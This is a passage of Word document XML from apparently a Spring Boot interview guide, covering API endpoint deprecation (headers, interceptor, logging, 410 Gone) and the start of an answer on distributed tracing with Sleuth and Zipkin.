    <w:p w14:paraId="61EEFAF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Notify Consumers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use headers, responses, and documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F041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Monitoring Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log and track the usage of deprecated endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ECB3D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Scheduled Removal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set a clear timeline for removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBBC52D"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2A4834">
          <v:rect id="_x0000_i2768" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D881E2C"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2. Implementation in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA5B1E"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1: Mark Endpoint as Deprecated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748685A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the @Deprecated annotation and a custom warning in your controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C17BB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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B493B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questMapping("/api/v1/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93CB1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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2211F" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1D62D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precated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E660EB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GetMapping("/old/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4ECA2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ResponseEntity&lt;String&gt; getEmployeeByIdOld(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD63C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Deprecated endpoint. Use /api/v2/employees/{id} instead.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9929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20D8DD9B" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABA52B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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904BE7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ResponseEntity&lt;String&gt; getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B3EE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Employee with ID: " + id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879312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3C5FB46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3E99C531"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0CB88">
          <v:rect id="_x0000_i2769" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2EAB7D"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2: Add Deprecation Warnings in Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1575A73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an interceptor to add deprecation warnings to responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9CA36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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D365A2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DeprecationInterceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D3D93" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279FD4B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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B15A8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boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB079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if (request.getRequestURI().contains("/old/")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A902E0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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            response.addHeader("Warning", "299 - Deprecated API: This endpoint will be removed soon. Use /api/v2/employees/{id}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842EFD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sponse.addHeader("Deprecation", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF85D3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sponse.addHeader("Link", "&lt;/api/v2/employees/{id}&gt;; rel=\"alternate\"");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C7A0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3081DB6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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CA99C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7779D98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189A19E3"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3: Register the Interceptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFC76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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F154C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WebConfig implements WebMvcConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364EC730" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073C554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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A1552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rivate DeprecationInterceptor deprecationInterceptor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384C550B" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63675059"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D825FD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void addInterceptors(InterceptorRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA492F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gistry.addInterceptor(deprecationInterceptor);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6632D"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4337623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3EC043B5"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2CF5AD">
          <v:rect id="_x0000_i2770" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F23B29"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Step 4: Update API Documentation (SpringDoc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D48DE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Operation(summary = "Get employee by ID (Deprecated)", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5053BF7D"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scription = "Use the new endpoint /api/v2/employees/{id}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5F49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deprecated = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4A74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GetMapping("/old/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1727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ResponseEntity&lt;String&gt; getEmployeeByIdOld(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1BAE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ok("Deprecated endpoint.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C81D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1F7EF9D7"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9BC72">
          <v:rect id="_x0000_i2771" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65437EED"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3. Monitoring Usage of Deprecated Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969316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Log each request to deprecated endpoints for tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399E89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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C68A2"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class DeprecatedEndpointLogger {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6D3C9" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB7A40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rivate static final Logger logger = LoggerFactory.getLogger(DeprecatedEndpointLogger.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D8559" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A91A67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public void logDeprecatedAccess(String endpoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACC65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logger.warn("Deprecated endpoint accessed: {}", endpoint);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4151D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED905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5FC6BD9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Use this logger inside the interceptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6663D98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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C755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rivate DeprecatedEndpointLogger logger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504F7DE0" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149CD55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if (request.getRequestURI().contains("/old/")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB131B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logger.logDeprecatedAccess(request.getRequestURI());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCFB6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71D60BB7"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F5002">
          <v:rect id="_x0000_i2772" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C4F23"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4. Informing Users through API Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4BBA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Return detailed deprecation information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666073A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precated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D42848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GetMapping("/old/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE3BA6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public ResponseEntity&lt;String&gt; getEmployeeByIdOld(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72456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ttpHeaders headers = new HttpHeaders();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD474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eaders.add("Warning", "299 - Deprecated API: Use /api/v2/employees/{id}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3005285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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    headers.add("Deprecation", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA7E5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headers.add("Link", "&lt;/api/v2/employees/{id}&gt;; rel=\"alternate\"");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE4B9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return ResponseEntity.status(HttpStatus.GONE).headers(headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6B43A"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 xml:space="preserve">            .body("This endpoint is deprecated. Please use /api/v2/employees/{id}.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CDCC6"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E919C"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D3A76">
          <v:rect id="_x0000_i2773" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B750D46"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5. Scheduled Removal of Deprecated Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B1D2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fine a timeline and notify users via email, API response, or a dedicated status page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA627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Set a deprecation date using headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1693F"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Schedule removal with a clear cutoff time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF57D3"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C8A3A0">
          <v:rect id="_x0000_i2774" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40990D7F"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6. Sample Response (Using Postman or Curl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7A4C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HTTP/1.1 410 Gone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69C98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Warning: 299 - Deprecated API: This endpoint will be removed soon. Use /api/v2/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2165FCD8"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Deprecation: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A19D0B"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Link: &lt;/api/v2/employees/{id}&gt;; rel="alternate"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312A02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Content-Type: text/plain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C964331"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Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C9EE4"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This endpoint is deprecated. Please use /api/v2/employees/{id}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228886D8" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00000000" w:rsidP="0012208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9F40A">
          <v:rect id="_x0000_i2775" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA9C32A" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB11307"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Advance Notification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inform API consumers through multiple channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33B52E"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Versioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use version numbers to differentiate new and old endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BA840C"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Consistent Logging:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Track the usage of deprecated endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45688E23"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Graceful Deletion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once the endpoint is removed, return 410 Gone status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57219D0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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Documentation Update:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clearly mark deprecated methods in API documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91AD85" w14:textId="77777777" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00122084">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By following these steps, you ensure a smooth transition from deprecated APIs to new ones, minimizing disruption while maintaining clear communication with API consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14237AC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2E51B">
          <v:rect id="_x0000_i2776" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A7438" w14:textId="1AF5D6DD" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00E5597A" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="688" w:name="_Toc197867902"/>
      <w:r w:rsidRPr="00E5597A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you correlate required trace flows which flows across multiple Spring Boot microservices for effective debugging and monitoring</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="688"/>
    </w:p>
    <w:p w14:paraId="67B96434" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00187C12" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E461341" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00187C12" w:rsidP="00187C12">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715D81D2" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00187C12" w:rsidP="00187C12">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD19C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To effectively correlate trace flows across multiple Spring Boot microservices, follow these practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665CEB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7D51FB">
          <v:rect id="_x0000_i2777" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7809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 Implement Distributed Tracing with Spring Cloud Sleuth and Zipkin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE143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 Cloud Sleuth provides unique trace and span IDs that flow across microservices, while Zipkin collects and visualizes trace data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9CA7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1: Add Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08D3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nclude Sleuth and Zipkin in each microservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B43AD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pendencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02434D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web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD8B2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cloud:spring-cloud-starter-sleuth'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD091D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cloud:spring-cloud-starter-zipkin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76DB5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09C8647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2: Configuration for Tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3830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application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for each microservice):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52873E5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EBD4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lication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F754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name: microservice-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122F8A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leuth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A968D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ampler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28FCD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bability: 1.0  # 100% of requests will be traced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277B48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zipkin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556117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base-url: http://localhost:9411  # Zipkin server URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7C07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zipkin.enabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF79B6" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7D04D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logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FC87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evel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2AF3B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rg.springframework.cloud.sleuth: DEBUG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5B0C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BECE97">
          <v:rect id="_x0000_i2778" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC1D7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2. How Tracing Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32F6C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Trace ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unique ID for an entire request across microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54332C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pan ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unique ID for a single operation within a trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C963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arent-Child Relationship:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trace IDs link the calls between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C835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Example Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7910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A:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Receives the initial request and generates a Trace ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42722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A → B:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
